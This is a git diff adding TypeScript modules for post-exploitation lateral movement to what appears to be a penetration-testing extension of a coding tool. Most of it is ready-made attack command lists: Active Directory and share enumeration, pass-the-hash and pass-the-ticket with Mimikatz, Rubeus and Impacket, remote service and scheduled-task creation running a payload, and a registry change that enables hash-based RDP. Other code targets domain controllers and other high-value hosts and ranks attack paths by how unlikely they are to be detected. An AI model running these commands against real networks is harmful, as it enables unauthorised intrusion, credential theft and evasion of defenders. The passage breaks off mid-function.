+      "",
+      "# Domain controllers",
+      "nltest /dclist:<domain>",
+      "echo %logonserver%",
+      "",
+      "# Domain trusts",
+      "nltest /domain_trusts",
+      "",
+      "# AD computer enumeration (PowerShell)",
+      "Get-ADComputer -Filter * | Select-Object Name, DNSHostName, IPv4Address",
+      "",
+      "# Network shares",
+      "net share",
+      "net view \\\\<hostname>",
+      "",
+      "# Remote Desktop connections history",
+      "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
+      "",
+      "# Recent connections",
+      "cmdkey /list",
+    ]
+  }
+
+  /**
+   * Generate AD-specific discovery commands.
+   */
+  export function getADDiscoveryCommands(): string[] {
+    return [
+      "# Domain information",
+      "[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()",
+      "",
+      "# Domain controllers",
+      "nltest /dclist:<domain>",
+      "[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers",
+      "",
+      "# Domain trusts",
+      "nltest /domain_trusts",
+      "([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()",
+      "",
+      "# Forest information",
+      "[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()",
+      "",
+      "# Enumerate computers",
+      "Get-ADComputer -Filter * -Properties * | Select Name,OperatingSystem,IPv4Address,LastLogonDate",
+      "",
+      "# Enumerate servers",
+      "Get-ADComputer -Filter 'OperatingSystem -like \"*server*\"' -Properties * | Select Name,OperatingSystem",
+      "",
+      "# Find high-value targets",
+      "# Domain Controllers",
+      "Get-ADDomainController -Filter *",
+      "",
+      "# SQL Servers (by SPN)",
+      "Get-ADComputer -Filter * -Properties ServicePrincipalNames | Where-Object {$_.ServicePrincipalNames -like '*MSSQL*'}",
+      "",
+      "# Exchange Servers",
+      "Get-ADComputer -Filter * -Properties ServicePrincipalNames | Where-Object {$_.ServicePrincipalNames -like '*exchange*'}",
+      "",
+      "# Administrative workstations",
+      "Get-ADComputer -Filter 'Name -like \"*admin*\" -or Name -like \"*mgmt*\"'",
+    ]
+  }
+
+  /**
+   * Generate share enumeration commands.
+   */
+  export function getShareEnumerationCommands(): string[] {
+    return [
+      "# Windows - List shares on remote host",
+      "net view \\\\<hostname>",
+      "",
+      "# Windows - List shares with permissions (requires admin)",
+      "Get-SmbShare",
+      "Get-SmbShareAccess -Name <share>",
+      "",
+      "# Windows - Access admin shares",
+      "dir \\\\<hostname>\\c$",
+      "dir \\\\<hostname>\\admin$",
+      "",
+      "# Linux - SMB share enumeration",
+      "smbclient -L //<hostname> -N",
+      "smbclient -L //<hostname> -U <user>%<pass>",
+      "",
+      "# Linux - List share contents",
+      "smbclient //<hostname>/<share> -N",
+      "smbclient //<hostname>/<share> -U <user>%<pass>",
+      "",
+      "# CME/NetExec share enumeration",
+      "crackmapexec smb <target> -u <user> -p <pass> --shares",
+      "netexec smb <target> -u <user> -p <pass> --shares",
+      "",
+      "# Find writable shares",
+      "crackmapexec smb <target> -u <user> -p <pass> --shares | grep WRITE",
+    ]
+  }
+
+  /**
+   * Analyze open ports and return potential lateral movement targets.
+   */
+  export function analyzeOpenPorts(
+    host: string,
+    ports: number[],
+    hostname?: string
+  ): PostExploitTypes.LateralTarget {
+    const methods: PostExploitTypes.LateralMethod[] = []
+    const services: string[] = []
+
+    for (const port of ports) {
+      const info = LATERAL_MOVEMENT_PORTS[port]
+      if (info) {
+        services.push(info.service)
+        for (const method of info.methods) {
+          if (!methods.includes(method)) {
+            methods.push(method)
+          }
+        }
+      }
+    }
+
+    return {
+      id: `target_${host.replace(/\./g, "_")}_${Date.now()}`,
+      ip: host,
+      hostname,
+      availableMethods: methods,
+      openPorts: ports,
+      services,
+      shares: [],
+      reachable: true,
+      credentials: [],
+      discoveredAt: Date.now(),
+    }
+  }
+
+  /**
+   * Identify high-value lateral movement targets.
+   */
+  export function identifyHighValueTargets(targets: PostExploitTypes.LateralTarget[]): PostExploitTypes.LateralTarget[] {
+    const highValueIndicators = [
+      /dc/i,      // Domain controller
+      /sql/i,     // SQL server
+      /db/i,      // Database
+      /exchange/i, // Exchange
+      /admin/i,   // Admin workstation
+      /mgmt/i,    // Management
+      /backup/i,  // Backup server
+      /file/i,    // File server
+      /jump/i,    // Jump box
+      /citrix/i,  // Citrix
+    ]
+
+    return targets.filter(target => {
+      const name = (target.hostname || target.ip).toLowerCase()
+      return highValueIndicators.some(pattern => pattern.test(name))
+    })
+  }
+
+  /**
+   * Format discovered targets for display.
+   */
+  export function formatTargets(targets: PostExploitTypes.LateralTarget[]): string {
+    if (targets.length === 0) {
+      return "No lateral movement targets discovered."
+    }
+
+    const lines: string[] = []
+    lines.push(`Discovered ${targets.length} potential lateral movement target(s):`)
+    lines.push("")
+
+    for (const target of targets) {
+      const name = target.hostname ? `${target.hostname} (${target.ip})` : target.ip
+      lines.push(`[TARGET] ${name}`)
+      lines.push(`  Open Ports: ${target.openPorts.join(", ")}`)
+      lines.push(`  Services: ${target.services.join(", ") || "Unknown"}`)
+      lines.push(`  Methods: ${target.availableMethods.join(", ") || "None identified"}`)
+      if (target.shares.length > 0) {
+        lines.push(`  Shares: ${target.shares.join(", ")}`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get recommended discovery tools.
+   */
+  export function getDiscoveryTools(): string[] {
+    return [
+      "nmap - Network scanner",
+      "crackmapexec/netexec - SMB/WinRM/etc enumeration",
+      "enum4linux - SMB enumeration",
+      "smbclient - SMB client",
+      "rpcclient - RPC client",
+      "ldapsearch - LDAP queries",
+      "BloodHound - AD attack path mapping",
+      "ADFind - AD enumeration",
+      "PowerView - AD PowerShell module",
+    ]
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/lateral/index.ts b/packages/opencode/src/pentest/postexploit/lateral/index.ts
new file mode 100644
index 00000000000..e49bca70d9f
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/lateral/index.ts
@@ -0,0 +1,200 @@
+/**
+ * @fileoverview Lateral Movement Module
+ *
+ * Exports for lateral movement discovery, methods, and path analysis.
+ *
+ * @module pentest/postexploit/lateral
+ */
+
+export { LateralDiscovery } from "./discovery"
+export { LateralMethods } from "./methods"
+export { LateralPaths } from "./paths"
+
+import { LateralDiscovery } from "./discovery"
+import { LateralMethods } from "./methods"
+import { LateralPaths } from "./paths"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified lateral movement interface.
+ */
+export namespace Lateral {
+  /**
+   * Get discovery commands for a platform.
+   */
+  export function getDiscoveryCommands(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return LateralDiscovery.getLinuxDiscoveryCommands()
+    } else {
+      return LateralDiscovery.getWindowsDiscoveryCommands()
+    }
+  }
+
+  /**
+   * Get all discovery commands including AD-specific.
+   */
+  export function getAllDiscoveryCommands(platform: PostExploitTypes.Platform): Record<string, string[]> {
+    const commands: Record<string, string[]> = {
+      network: getDiscoveryCommands(platform),
+      shares: LateralDiscovery.getShareEnumerationCommands(),
+    }
+
+    if (platform === "windows") {
+      commands.activeDirectory = LateralDiscovery.getADDiscoveryCommands()
+    }
+
+    return commands
+  }
+
+  /**
+   * Analyze a target and suggest methods.
+   */
+  export function analyzeTarget(
+    host: string,
+    ports: number[],
+    hostname?: string
+  ): PostExploitTypes.LateralTarget {
+    return LateralDiscovery.analyzeOpenPorts(host, ports, hostname)
+  }
+
+  /**
+   * Create a lateral movement path.
+   */
+  export function createPath(
+    source: string,
+    destination: string,
+    method: PostExploitTypes.LateralMethod,
+    options?: {
+      credentials?: string
+      credentialType?: "password" | "hash" | "ticket" | "key"
+      tested?: boolean
+      successful?: boolean
+      notes?: string
+    }
+  ): Omit<PostExploitTypes.LateralPath, "id" | "discoveredAt"> {
+    return LateralPaths.createPath(source, destination, method, options)
+  }
+
+  /**
+   * Get method details.
+   */
+  export function getMethodDetails(method: PostExploitTypes.LateralMethod) {
+    return LateralMethods.getMethod(method)
+  }
+
+  /**
+   * Get all available lateral movement methods for a platform.
+   */
+  export function getMethods(platform: PostExploitTypes.Platform): Array<{
+    name: string
+    description: string
+    detectionRisk: PostExploitTypes.DetectionRisk
+  }> {
+    const allMethods: PostExploitTypes.LateralMethod[] = [
+      "smb",
+      "wmi",
+      "winrm",
+      "rdp",
+      "ssh",
+      "pass_the_hash",
+      "pass_the_ticket",
+      "psexec",
+      "dcom",
+    ]
+
+    // Filter methods by platform
+    const platformMethods = allMethods.filter(method => {
+      const windowsOnly = ["wmi", "winrm", "rdp", "pass_the_hash", "pass_the_ticket", "psexec", "dcom"]
+      const linuxOnly = ["ssh"]
+      const crossPlatform = ["smb"]
+
+      if (platform === "linux") {
+        return linuxOnly.includes(method) || crossPlatform.includes(method)
+      } else {
+        return windowsOnly.includes(method) || crossPlatform.includes(method)
+      }
+    })
+
+    return platformMethods.map(method => {
+      const details = LateralMethods.getMethod(method)
+      return {
+        name: details?.name || method,
+        description: details?.description || `${method} lateral movement`,
+        detectionRisk: details?.detectionRisk || "medium",
+      }
+    })
+  }
+
+  /**
+   * Format targets for display.
+   */
+  export function formatTargets(targets: PostExploitTypes.LateralTarget[]): string {
+    return LateralDiscovery.formatTargets(targets)
+  }
+
+  /**
+   * Format paths for display.
+   */
+  export function formatPaths(paths: PostExploitTypes.LateralPath[]): string {
+    return LateralPaths.formatPathSummary(paths)
+  }
+
+  /**
+   * Format method for display.
+   */
+  export function formatMethod(method: PostExploitTypes.LateralMethod): string {
+    return LateralMethods.formatMethod(method)
+  }
+
+  /**
+   * Get recommended tools.
+   */
+  export function getTools(): string[] {
+    return [
+      ...LateralDiscovery.getDiscoveryTools(),
+      ...LateralMethods.getRecommendedTools(),
+    ].filter((tool, index, self) => self.indexOf(tool) === index)
+  }
+
+  /**
+   * Get quick reference for lateral movement.
+   */
+  export function getQuickReference(): string {
+    const lines: string[] = []
+    lines.push("LATERAL MOVEMENT QUICK REFERENCE")
+    lines.push("================================")
+    lines.push("")
+    lines.push("Discovery:")
+    lines.push("  nmap -sn <subnet>        # Host discovery")
+    lines.push("  nmap -sV <target>        # Service enumeration")
+    lines.push("  net view /domain         # Domain computers (Windows)")
+    lines.push("")
+    lines.push("SMB (Port 445):")
+    lines.push("  psexec.py <domain>/<user>:<pass>@<target>")
+    lines.push("  smbexec.py <domain>/<user>@<target> -hashes :<NTLM>")
+    lines.push("")
+    lines.push("WMI (Port 135):")
+    lines.push("  wmiexec.py <domain>/<user>:<pass>@<target>")
+    lines.push("")
+    lines.push("WinRM (Port 5985/5986):")
+    lines.push("  evil-winrm -i <target> -u <user> -p <pass>")
+    lines.push("  Enter-PSSession -ComputerName <target> -Credential $cred")
+    lines.push("")
+    lines.push("Pass-the-Hash:")
+    lines.push("  psexec.py <domain>/<user>@<target> -hashes :<NTLM>")
+    lines.push("  crackmapexec smb <target> -u <user> -H <NTLM>")
+    lines.push("")
+    lines.push("Pass-the-Ticket:")
+    lines.push("  export KRB5CCNAME=/path/to/ticket.ccache")
+    lines.push("  psexec.py -k -no-pass <domain>/<user>@<target>")
+    lines.push("")
+    lines.push("SSH (Port 22):")
+    lines.push("  ssh -i <key> <user>@<target>")
+    lines.push("  ssh -D 1080 <user>@<target>  # SOCKS proxy")
+    lines.push("")
+    lines.push("RDP (Port 3389):")
+    lines.push("  xfreerdp /v:<target> /u:<user> /p:<pass>")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/lateral/methods.ts b/packages/opencode/src/pentest/postexploit/lateral/methods.ts
new file mode 100644
index 00000000000..be76b3ec2db
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/lateral/methods.ts
@@ -0,0 +1,414 @@
+/**
+ * @fileoverview Lateral Movement Methods
+ *
+ * Provides guidance for various lateral movement techniques including
+ * SMB, WMI, SSH, RDP, PSRemoting, and credential-based attacks.
+ *
+ * @module pentest/postexploit/lateral/methods
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Lateral movement methods namespace.
+ */
+export namespace LateralMethods {
+  /**
+   * SMB-based lateral movement techniques.
+   */
+  export const SMB_METHODS = {
+    psexec: {
+      name: "PsExec",
+      description: "Execute commands via SMB using service installation",
+      requirements: ["SMB access (445)", "Admin credentials or hash", "ADMIN$ share access"],
+      commands: [
+        "# Sysinternals PsExec",
+        "psexec.exe \\\\<target> -u <domain>\\<user> -p <pass> cmd.exe",
+        "",
+        "# Impacket psexec.py",
+        "psexec.py <domain>/<user>:<pass>@<target>",
+        "psexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "",
+        "# Metasploit",
+        "use exploit/windows/smb/psexec",
+        "set RHOSTS <target>",
+        "set SMBUser <user>",
+        "set SMBPass <pass>",
+        "run",
+      ],
+      detectionRisk: "high" as const,
+      mitre: ["T1021.002", "T1569.002"],
+    },
+    smbexec: {
+      name: "SMBExec",
+      description: "Semi-interactive shell via SMB without service installation",
+      requirements: ["SMB access (445)", "Admin credentials or hash"],
+      commands: [
+        "# Impacket smbexec.py",
+        "smbexec.py <domain>/<user>:<pass>@<target>",
+        "smbexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1021.002"],
+    },
+    atexec: {
+      name: "AtExec",
+      description: "Execute commands via scheduled task over SMB",
+      requirements: ["SMB access (445)", "Admin credentials or hash"],
+      commands: [
+        "# Impacket atexec.py",
+        'atexec.py <domain>/<user>:<pass>@<target> "command"',
+        'atexec.py <domain>/<user>@<target> -hashes :<NTLM> "whoami"',
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1021.002", "T1053.005"],
+    },
+  }
+
+  /**
+   * WMI-based lateral movement techniques.
+   */
+  export const WMI_METHODS = {
+    wmiexec: {
+      name: "WMIExec",
+      description: "Execute commands via WMI (Windows Management Instrumentation)",
+      requirements: ["RPC access (135)", "Admin credentials or hash", "WMI enabled"],
+      commands: [
+        "# Impacket wmiexec.py",
+        "wmiexec.py <domain>/<user>:<pass>@<target>",
+        "wmiexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "",
+        "# Native PowerShell",
+        '$cred = Get-Credential',
+        'Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami" -ComputerName <target> -Credential $cred',
+        "",
+        "# WMIC",
+        'wmic /node:<target> /user:<user> /password:<pass> process call create "cmd.exe /c whoami"',
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1047"],
+    },
+    dcomexec: {
+      name: "DCOMExec",
+      description: "Execute commands via DCOM (Distributed COM)",
+      requirements: ["RPC access (135)", "Admin credentials", "DCOM enabled"],
+      commands: [
+        "# Impacket dcomexec.py",
+        "dcomexec.py <domain>/<user>:<pass>@<target>",
+        "dcomexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "",
+        "# Using different DCOM objects",
+        "dcomexec.py -object MMC20 <domain>/<user>:<pass>@<target>",
+        "dcomexec.py -object ShellWindows <domain>/<user>:<pass>@<target>",
+        "dcomexec.py -object ShellBrowserWindow <domain>/<user>:<pass>@<target>",
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1021.003"],
+    },
+  }
+
+  /**
+   * Remote access protocol methods.
+   */
+  export const REMOTE_ACCESS_METHODS = {
+    ssh: {
+      name: "SSH",
+      description: "Secure Shell for Linux/Unix systems",
+      requirements: ["SSH access (22)", "Valid credentials or key"],
+      commands: [
+        "# Password authentication",
+        "ssh <user>@<target>",
+        "",
+        "# Key authentication",
+        "ssh -i <key_file> <user>@<target>",
+        "",
+        "# Port forwarding",
+        "ssh -L <local_port>:<remote_host>:<remote_port> <user>@<target>",
+        "ssh -D 1080 <user>@<target>  # SOCKS proxy",
+        "",
+        "# SSH through jump host",
+        "ssh -J <jump_user>@<jump_host> <user>@<target>",
+      ],
+      detectionRisk: "low" as const,
+      mitre: ["T1021.004"],
+    },
+    rdp: {
+      name: "RDP",
+      description: "Remote Desktop Protocol for Windows GUI access",
+      requirements: ["RDP access (3389)", "Valid credentials", "Network Level Authentication may require additional config"],
+      commands: [
+        "# Windows native",
+        "mstsc /v:<target>",
+        "",
+        "# Linux with xfreerdp",
+        "xfreerdp /v:<target> /u:<user> /p:<pass>",
+        "xfreerdp /v:<target> /u:<domain>\\\\<user> /p:<pass>",
+        "",
+        "# Linux with rdesktop",
+        "rdesktop -u <user> -p <pass> <target>",
+        "",
+        "# Pass-the-Hash RDP (requires restricted admin mode)",
+        "xfreerdp /v:<target> /u:<user> /pth:<NTLM>",
+        "",
+        "# Enable restricted admin mode (on target)",
+        'reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f',
+      ],
+      detectionRisk: "low" as const,
+      mitre: ["T1021.001"],
+    },
+    winrm: {
+      name: "WinRM / PowerShell Remoting",
+      description: "Windows Remote Management for PowerShell remoting",
+      requirements: ["WinRM access (5985/5986)", "Valid credentials", "WinRM enabled on target"],
+      commands: [
+        "# Enable PowerShell Remoting (on target if not enabled)",
+        "Enable-PSRemoting -Force",
+        "",
+        "# Interactive session",
+        '$cred = Get-Credential',
+        "Enter-PSSession -ComputerName <target> -Credential $cred",
+        "",
+        "# Non-interactive command execution",
+        "Invoke-Command -ComputerName <target> -Credential $cred -ScriptBlock { whoami }",
+        "",
+        "# From Linux with evil-winrm",
+        "evil-winrm -i <target> -u <user> -p <pass>",
+        "evil-winrm -i <target> -u <user> -H <NTLM>",
+        "",
+        "# CrackMapExec/NetExec",
+        "crackmapexec winrm <target> -u <user> -p <pass> -x whoami",
+        "netexec winrm <target> -u <user> -p <pass> -x whoami",
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1021.006"],
+    },
+  }
+
+  /**
+   * Credential-based lateral movement (Pass-the-* attacks).
+   */
+  export const CREDENTIAL_ATTACKS = {
+    pass_the_hash: {
+      name: "Pass-the-Hash",
+      description: "Authenticate using NTLM hash without knowing the password",
+      requirements: ["NTLM hash", "Target supports NTLM authentication"],
+      commands: [
+        "# Impacket tools",
+        "psexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "wmiexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "smbexec.py <domain>/<user>@<target> -hashes :<NTLM>",
+        "",
+        "# CrackMapExec/NetExec",
+        "crackmapexec smb <target> -u <user> -H <NTLM>",
+        "netexec smb <target> -u <user> -H <NTLM>",
+        "",
+        "# Mimikatz",
+        'sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM> /run:"cmd.exe"',
+        "",
+        "# xfreerdp (requires restricted admin)",
+        "xfreerdp /v:<target> /u:<user> /pth:<NTLM>",
+      ],
+      detectionRisk: "medium" as const,
+      mitre: ["T1550.002"],
+    },
+    pass_the_ticket: {
+      name: "Pass-the-Ticket",
+      description: "Authenticate using Kerberos ticket",
+      requirements: ["Kerberos ticket (.kirbi or .ccache)", "Target in same domain/forest"],
+      commands: [
+        "# Convert ticket format if needed",
+        "ticketConverter.py ticket.kirbi ticket.ccache",
+        "",
+        "# Set KRB5CCNAME environment variable",
+        "export KRB5CCNAME=/path/to/ticket.ccache",
+        "",
+        "# Use with Impacket",
+        "psexec.py -k -no-pass <domain>/<user>@<target>",
+        "wmiexec.py -k -no-pass <domain>/<user>@<target>",
+        "",
+        "# Mimikatz (inject ticket)",
+        "kerberos::ptt ticket.kirbi",
+        "misc::cmd",
+        "",
+        "# Rubeus",
+        "Rubeus.exe ptt /ticket:<base64_ticket>",
+      ],
+      detectionRisk: "low" as const,
+      mitre: ["T1550.003"],
+    },
+    overpass_the_hash: {
+      name: "Overpass-the-Hash",
+      description: "Use NTLM hash to request Kerberos ticket",
+      requirements: ["NTLM hash", "Access to KDC", "Target uses Kerberos"],
+      commands: [
+        "# Impacket getTGT",
+        "getTGT.py <domain>/<user> -hashes :<NTLM>",
+        "export KRB5CCNAME=<user>.ccache",
+        "",
+        "# Then use with Kerberos authentication",
+        "psexec.py -k -no-pass <domain>/<user>@<target>",
+        "",
+        "# Mimikatz",
+        'sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM> /run:"cmd.exe"',
+        "# This spawns cmd with a TGT in memory",
+        "",
+        "# Rubeus",
+        "Rubeus.exe asktgt /user:<user> /rc4:<NTLM>",
+      ],
+      detectionRisk: "low" as const,
+      mitre: ["T1550.002"],
+    },
+  }
+
+  /**
+   * Get method details by name.
+   */
+  export function getMethod(method: PostExploitTypes.LateralMethod): {
+    name: string
+    description: string
+    requirements: string[]
+    commands: string[]
+    detectionRisk: PostExploitTypes.DetectionRisk
+    mitre: string[]
+  } | undefined {
+    const allMethods = {
+      smb: SMB_METHODS.psexec,
+      psexec: SMB_METHODS.psexec,
+      smbexec: SMB_METHODS.smbexec,
+      wmi: WMI_METHODS.wmiexec,
+      wmiexec: WMI_METHODS.wmiexec,
+      dcom: WMI_METHODS.dcomexec,
+      ssh: REMOTE_ACCESS_METHODS.ssh,
+      rdp: REMOTE_ACCESS_METHODS.rdp,
+      winrm: REMOTE_ACCESS_METHODS.winrm,
+      psremoting: REMOTE_ACCESS_METHODS.winrm,
+      pass_the_hash: CREDENTIAL_ATTACKS.pass_the_hash,
+      pass_the_ticket: CREDENTIAL_ATTACKS.pass_the_ticket,
+      overpass_the_hash: CREDENTIAL_ATTACKS.overpass_the_hash,
+      scheduled_task_remote: {
+        name: "Remote Scheduled Task",
+        description: "Create scheduled task on remote system",
+        requirements: ["Admin credentials", "Task Scheduler access"],
+        commands: [
+          "# Create remote scheduled task",
+          'schtasks /create /s <target> /u <user> /p <pass> /tn "TaskName" /tr "cmd /c payload.exe" /sc once /st 00:00 /ru SYSTEM',
+          "",
+          "# Run the task",
+          'schtasks /run /s <target> /u <user> /p <pass> /tn "TaskName"',
+          "",
+          "# Delete the task",
+          'schtasks /delete /s <target> /u <user> /p <pass> /tn "TaskName" /f',
+        ],
+        detectionRisk: "high" as const,
+        mitre: ["T1053.005"],
+      },
+      service_remote: {
+        name: "Remote Service Creation",
+        description: "Create and start service on remote system",
+        requirements: ["Admin credentials", "Service Control Manager access"],
+        commands: [
+          "# Create remote service",
+          'sc \\\\<target> create <service_name> binPath= "C:\\path\\to\\payload.exe"',
+          "",
+          "# Start the service",
+          "sc \\\\<target> start <service_name>",
+          "",
+          "# Delete the service",
+          "sc \\\\<target> delete <service_name>",
+        ],
+        detectionRisk: "high" as const,
+        mitre: ["T1569.002"],
+      },
+    }
+
+    return allMethods[method]
+  }
+
+  /**
+   * Get methods available for given ports.
+   */
+  export function getMethodsForPorts(ports: number[]): PostExploitTypes.LateralMethod[] {
+    const methods: Set<PostExploitTypes.LateralMethod> = new Set()
+
+    if (ports.includes(445) || ports.includes(139)) {
+      methods.add("smb")
+      methods.add("psexec")
+      methods.add("smbexec")
+      methods.add("pass_the_hash")
+    }
+    if (ports.includes(135)) {
+      methods.add("wmi")
+      methods.add("dcom")
+    }
+    if (ports.includes(22)) {
+      methods.add("ssh")
+    }
+    if (ports.includes(3389)) {
+      methods.add("rdp")
+    }
+    if (ports.includes(5985) || ports.includes(5986)) {
+      methods.add("winrm")
+      methods.add("psremoting")
+    }
+
+    return Array.from(methods)
+  }
+
+  /**
+   * Format method details for display.
+   */
+  export function formatMethod(method: PostExploitTypes.LateralMethod): string {
+    const details = getMethod(method)
+    if (!details) {
+      return `Unknown method: ${method}`
+    }
+
+    const lines: string[] = []
+    lines.push(`Method: ${details.name}`)
+    lines.push(`Description: ${details.description}`)
+    lines.push("")
+    lines.push("Requirements:")
+    for (const req of details.requirements) {
+      lines.push(`  - ${req}`)
+    }
+    lines.push("")
+    lines.push(`Detection Risk: ${details.detectionRisk}`)
+    lines.push("")
+    lines.push("Commands:")
+    for (const cmd of details.commands) {
+      lines.push(`  ${cmd}`)
+    }
+    lines.push("")
+    lines.push(`MITRE ATT&CK: ${details.mitre.join(", ")}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get all method names grouped by category.
+   */
+  export function getAllMethods(): Record<string, string[]> {
+    return {
+      "SMB-based": Object.keys(SMB_METHODS),
+      "WMI/DCOM": Object.keys(WMI_METHODS),
+      "Remote Access": Object.keys(REMOTE_ACCESS_METHODS),
+      "Credential Attacks": Object.keys(CREDENTIAL_ATTACKS),
+    }
+  }
+
+  /**
+   * Get recommended tools for lateral movement.
+   */
+  export function getRecommendedTools(): string[] {
+    return [
+      "Impacket - Python tools for network protocols",
+      "CrackMapExec/NetExec - Swiss army knife for pentesting",
+      "Evil-WinRM - WinRM shell for pentesting",
+      "Mimikatz - Credential extraction and manipulation",
+      "Rubeus - Kerberos abuse toolkit",
+      "PowerShell - Native Windows remoting",
+      "xfreerdp - Linux RDP client",
+      "chisel - TCP/UDP tunnel over HTTP",
+    ]
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/lateral/paths.ts b/packages/opencode/src/pentest/postexploit/lateral/paths.ts
new file mode 100644
index 00000000000..c1328f1fe49
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/lateral/paths.ts
@@ -0,0 +1,354 @@
+/**
+ * @fileoverview Lateral Movement Path Analysis
+ *
+ * Provides analysis and guidance for identifying and evaluating
+ * lateral movement paths between compromised and target systems.
+ *
+ * @module pentest/postexploit/lateral/paths
+ */
+
+import { PostExploitTypes } from "../types"
+import { LateralMethods } from "./methods"
+
+/**
+ * Lateral movement path analysis namespace.
+ */
+export namespace LateralPaths {
+  /**
+   * Create a lateral movement path from source to destination.
+   */
+  export function createPath(
+    source: string,
+    destination: string,
+    method: PostExploitTypes.LateralMethod,
+    options: {
+      credentials?: string
+      credentialType?: "password" | "hash" | "ticket" | "key"
+      tested?: boolean
+      successful?: boolean
+      notes?: string
+    } = {}
+  ): Omit<PostExploitTypes.LateralPath, "id" | "discoveredAt"> {
+    const methodDetails = LateralMethods.getMethod(method)
+
+    return {
+      source,
+      destination,
+      method,
+      credentials: options.credentials,
+      credentialType: options.credentialType,
+      risk: determineRisk(method, options.credentialType),
+      detectionRisk: methodDetails?.detectionRisk || "medium",
+      commands: methodDetails?.commands || [],
+      prerequisites: methodDetails?.requirements || [],
+      mitre: methodDetails?.mitre || [],
+      notes: options.notes,
+      tested: options.tested || false,
+      successful: options.successful,
+    }
+  }
+
+  /**
+   * Determine risk level based on method and credential type.
+   */
+  function determineRisk(
+    method: PostExploitTypes.LateralMethod,
+    credentialType?: "password" | "hash" | "ticket" | "key"
+  ): PostExploitTypes.Severity {
+    // High-risk methods
+    if (["pass_the_hash", "pass_the_ticket", "overpass_the_hash"].includes(method)) {
+      return "high"
+    }
+
+    // Methods with service creation are higher risk
+    if (["psexec", "service_remote", "scheduled_task_remote"].includes(method)) {
+      return "high"
+    }
+
+    // Lower risk methods
+    if (method === "ssh" || method === "rdp") {
+      return "medium"
+    }
+
+    // Hash-based authentication without cleartext
+    if (credentialType === "hash") {
+      return "high"
+    }
+
+    return "medium"
+  }
+
+  /**
+   * Analyze possible paths from a source to multiple targets.
+   */
+  export function analyzePaths(
+    source: string,
+    targets: PostExploitTypes.LateralTarget[],
+    availableCredentials: {
+      type: "password" | "hash" | "ticket" | "key"
+      username?: string
+      domain?: string
+    }[]
+  ): PostExploitTypes.LateralPath[] {
+    const paths: PostExploitTypes.LateralPath[] = []
+    let pathId = 0
+
+    for (const target of targets) {
+      for (const method of target.availableMethods) {
+        // Check if we have appropriate credentials for this method
+        for (const cred of availableCredentials) {
+          if (isCredentialValidForMethod(method, cred.type)) {
+            const pathData = createPath(source, target.ip, method, {
+              credentialType: cred.type,
+              credentials: cred.username ? `${cred.domain ? cred.domain + "\\" : ""}${cred.username}` : undefined,
+            })
+
+            paths.push({
+              ...pathData,
+              id: `path_${++pathId}_${Date.now()}`,
+              discoveredAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    // Sort by risk (critical first) and detection risk (low first)
+    return paths.sort((a, b) => {
+      const riskOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 }
+      const detectionOrder = { low: 0, medium: 1, high: 2 }
+
+      const riskDiff = riskOrder[a.risk] - riskOrder[b.risk]
+      if (riskDiff !== 0) return riskDiff
+
+      return detectionOrder[a.detectionRisk] - detectionOrder[b.detectionRisk]
+    })
+  }
+
+  /**
+   * Check if a credential type is valid for a given method.
+   */
+  function isCredentialValidForMethod(
+    method: PostExploitTypes.LateralMethod,
+    credType: "password" | "hash" | "ticket" | "key"
+  ): boolean {
+    switch (method) {
+      case "ssh":
+        return credType === "password" || credType === "key"
+      case "rdp":
+        return credType === "password" || credType === "hash" // hash requires restricted admin
+      case "pass_the_hash":
+        return credType === "hash"
+      case "pass_the_ticket":
+        return credType === "ticket"
+      case "overpass_the_hash":
+        return credType === "hash"
+      default:
+        return credType === "password" || credType === "hash"
+    }
+  }
+
+  /**
+   * Get the optimal path to a target.
+   */
+  export function getOptimalPath(
+    paths: PostExploitTypes.LateralPath[],
+    target: string
+  ): PostExploitTypes.LateralPath | undefined {
+    const targetPaths = paths.filter(p => p.destination === target)
+
+    if (targetPaths.length === 0) return undefined
+
+    // Prioritize: tested successful paths, then low detection risk, then high impact
+    return targetPaths.sort((a, b) => {
+      // Successful tested paths first
+      if (a.successful && !b.successful) return -1
+      if (!a.successful && b.successful) return 1
+
+      // Low detection risk
+      const detectionOrder = { low: 0, medium: 1, high: 2 }
+      const detectionDiff = detectionOrder[a.detectionRisk] - detectionOrder[b.detectionRisk]
+      if (detectionDiff !== 0) return detectionDiff
+
+      return 0
+    })[0]
+  }
+
+  /**
+   * Find all paths to high-value targets.
+   */
+  export function findPathsToHighValue(
+    paths: PostExploitTypes.LateralPath[],
+    highValueTargets: string[]
+  ): PostExploitTypes.LateralPath[] {
+    return paths.filter(p =>
+      highValueTargets.some(hvt =>
